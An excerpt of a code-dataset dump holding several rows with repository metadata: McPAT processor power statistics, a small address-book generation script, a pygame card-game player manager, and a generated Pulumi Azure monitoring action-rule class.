'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000593952,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00388299,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00903028,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0397479,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.5283,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.100475,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.135002,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.86952,
'Instruction Fetch Unit/Runtime Dynamic': 0.288137,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0229324,
'L2/Runtime Dynamic': 0.00416145,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.5319,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.626983,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0418893,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0418893,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.72971,
'Load Store Unit/Runtime Dynamic': 0.875457,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.103292,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.206584,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0366586,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.037002,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.157201,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0164745,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.376283,
'Memory Management Unit/Runtime Dynamic': 0.0534764,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7877,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0269847,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00634203,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0685573,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.101884,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.70743,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.097345545003192,
'Runtime Dynamic': 5.097345545003192,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.261124,
'Runtime Dynamic': 0.0835134,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 75.8456,
'Peak Power': 108.958,
'Runtime Dynamic': 17.0303,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 75.5845,
'Total Cores/Runtime Dynamic': 16.9468,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.261124,
'Total L3s/Runtime Dynamic': 0.0835134,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.075492 | 124 | 0.682129 | 8,082 | 68,619 | 5.785573 | 0.067681 | 0.123527 | 0.112919 | 0.093415 | 0.939113 | 0.931243 | 0.917855 | 0.886097 | 0.862871 | 0.842234 | 0 | 0.132111 | 0.224296 | 68,619 | 914 | 125 | 75.075492 | 0.746355 | 0 | 0 | 0.642232 | 0 | 0 | 0.657316 | 0.048091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
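The core entry above flattens the McPAT component hierarchy into slash-delimited keys ('Execution Unit/Results Broadcast Bus/Gate Leakage' and so on). A minimal sketch, not part of the row, of unflattening such an entry into a nested dict; the sample values are copied from the entry above and the variable names are illustrative:

```python
def nest(flat):
    """Turn {'A/B/Metric': v} into {'A': {'B': {'Metric': v}}}."""
    tree = {}
    for key, value in flat.items():
        *path, metric = key.split('/')
        node = tree
        for part in path:
            node = node.setdefault(part, {})
        node[metric] = value
    return tree

core = {  # excerpt of the entry above
    'Execution Unit/Runtime Dynamic': 1.38431,
    'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.100475,
    'Runtime Dynamic': 2.70743,
}
print(nest(core)['Instruction Fetch Unit'])
# {'Instruction Cache': {'Runtime Dynamic': 0.100475}}
```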
3344166e05a79580d3dd00f0ef3a322a014a2ac1 | 210 | py | Python | src/icemac/ab/calexport/generations/install.py | icemac/icemac.ab.calexport | ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c | [
"BSD-2-Clause"
] | null | null | null | src/icemac/ab/calexport/generations/install.py | icemac/icemac.ab.calexport | ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c | [
"BSD-2-Clause"
] | null | null | null | src/icemac/ab/calexport/generations/install.py | icemac/icemac.ab.calexport | ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c | [
"BSD-2-Clause"
] | null | null | null | import icemac.addressbook.generations.utils
@icemac.addressbook.generations.utils.evolve_addressbooks
def evolve(address_book):
"""Install the calendar export into each existing address book."""
pass
| 26.25 | 70 | 0.795238 | 25 | 210 | 6.6 | 0.72 | 0.206061 | 0.339394 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 210 | 7 | 71 | 30 | 0.891892 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
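The `evolve_addressbooks` decorator above comes from icemac.addressbook, whose implementation is not part of this row. Below is a hedged sketch of the general shape such a decorator plausibly takes, with the context lookup replaced by a stand-in (the real code walks the ZODB root, so every name here is an assumption):

```python
def evolve_addressbooks(func):
    """Hypothetical shape: lift a per-address-book step over all books."""
    def evolver(context):
        for address_book in context.values():  # stand-in lookup, not real API
            func(address_book)
    return evolver

@evolve_addressbooks
def evolve(address_book):
    print('evolving', address_book)

evolve({'ab': 'demo address book'})  # prints: evolving demo address book
```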
6832e7e3c7a2594b78866b01469616cdc7205e8e | 8,048 | py | Python | playerManager.py | Kassicus/cards | 46c13166d8ef114d1c4be0bcd9758d21ac5953e5 | [
"MIT"
] | null | null | null | playerManager.py | Kassicus/cards | 46c13166d8ef114d1c4be0bcd9758d21ac5953e5 | [
"MIT"
] | null | null | null | playerManager.py | Kassicus/cards | 46c13166d8ef114d1c4be0bcd9758d21ac5953e5 | [
"MIT"
] | null | null | null | #Copyright (c) 2021 Kason Suchow
import pygame
import ui
import data
import cards
import cardManager
class PlayerOne():
    """Bottom player: owns the mana/meditation counters and the deck, hand,
    defender, attacker and graveyard card piles."""
def __init__(self):
self.redMana = 0
self.blueMana = 0
self.greenMana = 0
self.meditationPoints = 3
self.redManaCounter = ui.ManaCounter(903, 508, 'red')
self.blueManaCounter = ui.ManaCounter(948, 508, 'blue')
self.greenManaCounter = ui.ManaCounter(925, 410, 'green')
self.meditationCounter = ui.MeditationCounter(923, 608)
self.deck = [
cards.RedMana(),
cards.BlueMana(),
cards.GreenMana(),
cards.Turtle(),
cards.Souls()
]
self.deckpos = (18, 670)
self.hand = []
self.handpos = (120, 670)
self.defenders = []
self.defenderspos = (18, 535)
self.attackers = []
self.attackerspos = (18, 412)
self.graveyard = []
self.graveyardpos = (801, 670)
cardManager.placeDeck(self)
cardManager.shuffleDeck(self)
def draw(self, surface):
self.drawCounters(surface)
self.drawCards(surface)
def update(self):
self.updateCounters()
self.updateCards()
def drawCounters(self, surface):
self.redManaCounter.draw(surface)
self.blueManaCounter.draw(surface)
self.greenManaCounter.draw(surface)
self.meditationCounter.draw(surface)
def drawCards(self, surface):
for x in range(len(self.deck)):
card = self.deck[x]
card.draw(surface)
for x in range(len(self.hand)):
card = self.hand[x]
card.draw(surface)
for x in range(len(self.defenders)):
card = self.defenders[x]
card.draw(surface)
for x in range(len(self.attackers)):
card = self.attackers[x]
card.draw(surface)
for x in range(len(self.graveyard)):
card = self.graveyard[x]
card.draw(surface)
def updateCounters(self):
self.redManaCounter.update(self.redMana)
self.blueManaCounter.update(self.blueMana)
self.greenManaCounter.update(self.greenMana)
self.meditationCounter.update(self.meditationPoints)
    def updateCards(self):
        # The bare excepts below absorb IndexErrors: the cardManager calls
        # mutate these lists while they are being indexed.
for x in range(len(self.deck)):
try:
card = self.deck[x]
card.update()
except:
pass
for x in range(len(self.hand)):
try:
card = self.hand[x]
card.update()
card.checkClicked(self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.hand, x, self)
if card.move == 'defenders':
cardManager.moveCardToDefenders(x, self)
if card.move == 'attackers':
cardManager.moveCardToAttackers(x, self)
except:
pass
for x in range(len(self.defenders)):
try:
card = self.defenders[x]
card.update()
card.checkSelected()
if card.move == 'hand':
cardManager.bounceCardToHand(self.defenders, x, self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.defenders, x, self)
except:
pass
for x in range(len(self.attackers)):
try:
card = self.attackers[x]
card.update()
card.checkSelected()
if card.move == 'hand':
cardManager.bounceCardToHand(self.attackers, x, self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.attackers, x, self)
except:
pass
for x in range(len(self.graveyard)):
try:
card = self.graveyard[x]
card.update()
except:
pass
class PlayerTwo():
    """Top player: mirrors PlayerOne with the counters and card piles laid
    out in the upper half of the board."""
def __init__(self):
self.redMana = 0
self.blueMana = 0
self.greenMana = 0
self.meditationPoints = 3
self.redManaCounter = ui.ManaCounter(13, 248, 'red')
self.blueManaCounter = ui.ManaCounter(58, 248, 'blue')
self.greenManaCounter = ui.ManaCounter(35, 150, 'green')
self.meditationCounter = ui.MeditationCounter(33, 348)
self.deck = [
cards.BlueMana(),
cards.BlueMana(),
cards.BlueMana(),
cards.BlueMana(),
cards.BlueMana()
]
self.deckpos = (902, 18)
self.hand = []
self.handpos = (220, 18)
self.defenders = []
self.defenderspos = (118, 152)
self.attackers = []
self.attackerspos = (118, 275)
self.graveyard = []
self.graveyardpos = (118, 18)
cardManager.placeDeck(self)
cardManager.shuffleDeck(self)
def draw(self, surface):
self.drawCounters(surface)
self.drawCards(surface)
def update(self):
self.updateCounters()
self.updateCards()
def drawCounters(self, surface):
self.redManaCounter.draw(surface)
self.blueManaCounter.draw(surface)
self.greenManaCounter.draw(surface)
self.meditationCounter.draw(surface)
def drawCards(self, surface):
for x in range(len(self.deck)):
card = self.deck[x]
card.draw(surface)
for x in range(len(self.hand)):
card = self.hand[x]
card.draw(surface)
for x in range(len(self.defenders)):
card = self.defenders[x]
card.draw(surface)
for x in range(len(self.attackers)):
card = self.attackers[x]
card.draw(surface)
for x in range(len(self.graveyard)):
card = self.graveyard[x]
card.draw(surface)
def updateCounters(self):
self.redManaCounter.update(self.redMana)
self.blueManaCounter.update(self.blueMana)
self.greenManaCounter.update(self.greenMana)
self.meditationCounter.update(self.meditationPoints)
    def updateCards(self):
        # As in PlayerOne, the bare excepts absorb IndexErrors caused by the
        # cardManager mutating these lists while they are being indexed.
for x in range(len(self.deck)):
try:
card = self.deck[x]
card.update()
except:
pass
for x in range(len(self.hand)):
try:
card = self.hand[x]
card.update()
card.checkClicked(self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.hand, x, self)
if card.move == 'defenders':
cardManager.moveCardToDefenders(x, self)
if card.move == 'attackers':
cardManager.moveCardToAttackers(x, self)
except:
pass
for x in range(len(self.defenders)):
try:
card = self.defenders[x]
card.update()
card.checkSelected()
if card.move == 'hand':
cardManager.bounceCardToHand(self.defenders, x, self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.defenders, x, self)
except:
pass
for x in range(len(self.attackers)):
try:
card = self.attackers[x]
card.update()
card.checkSelected()
if card.move == 'hand':
cardManager.bounceCardToHand(self.attackers, x, self)
if card.move == 'graveyard':
cardManager.removeCardFromLibrary(self.attackers, x, self)
except:
pass
for x in range(len(self.graveyard)):
try:
card = self.graveyard[x]
card.update()
except:
pass
| 27.281356 | 78 | 0.527336 | 775 | 8,048 | 5.465806 | 0.12129 | 0.018886 | 0.028329 | 0.051936 | 0.877479 | 0.822238 | 0.822238 | 0.822238 | 0.806893 | 0.806893 | 0 | 0.021666 | 0.36916 | 8,048 | 294 | 79 | 27.37415 | 0.812685 | 0.003852 | 0 | 0.855204 | 0 | 0 | 0.016218 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063348 | false | 0.045249 | 0.022624 | 0 | 0.095023 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
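A minimal driver loop for the two player classes, assuming the repository's ui, cards and cardManager modules are importable; the window size, background colour and frame rate are assumptions, not values taken from the repo:

```python
import pygame
import playerManager

pygame.init()
surface = pygame.display.set_mode((1024, 768))  # size is an assumption
clock = pygame.time.Clock()
players = [playerManager.PlayerOne(), playerManager.PlayerTwo()]

running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    surface.fill((0, 80, 0))  # felt-green background, arbitrary choice
    for player in players:
        player.update()
        player.draw(surface)
    pygame.display.flip()
    clock.tick(60)
pygame.quit()
```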
6848b205ceada98f1e98f9662b57aa7fe6503ea8 | 24,044 | py | Python | sdk/python/pulumi_azure/monitoring/action_rule_action_group.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/monitoring/action_rule_action_group.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/monitoring/action_rule_action_group.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ActionRuleActionGroupArgs', 'ActionRuleActionGroup']
@pulumi.input_type
class ActionRuleActionGroupArgs:
def __init__(__self__, *,
action_group_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
condition: Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ActionRuleActionGroup resource.
:param pulumi.Input[str] action_group_id: Specifies the resource id of monitor action group.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleActionGroupConditionArgs'] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleActionGroupScopeArgs'] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "action_group_id", action_group_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if condition is not None:
pulumi.set(__self__, "condition", condition)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="actionGroupId")
def action_group_id(self) -> pulumi.Input[str]:
"""
Specifies the resource id of monitor action group.
"""
return pulumi.get(self, "action_group_id")
@action_group_id.setter
def action_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "action_group_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ActionRuleActionGroupState:
def __init__(__self__, *,
action_group_id: Optional[pulumi.Input[str]] = None,
condition: Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ActionRuleActionGroup resources.
:param pulumi.Input[str] action_group_id: Specifies the resource id of monitor action group.
:param pulumi.Input['ActionRuleActionGroupConditionArgs'] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleActionGroupScopeArgs'] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if action_group_id is not None:
pulumi.set(__self__, "action_group_id", action_group_id)
if condition is not None:
pulumi.set(__self__, "condition", condition)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="actionGroupId")
def action_group_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the resource id of monitor action group.
"""
return pulumi.get(self, "action_group_id")
@action_group_id.setter
def action_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action_group_id", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ActionRuleActionGroupConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input['ActionRuleActionGroupScopeArgs']]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ActionRuleActionGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action_group_id: Optional[pulumi.Input[str]] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']]] = None,
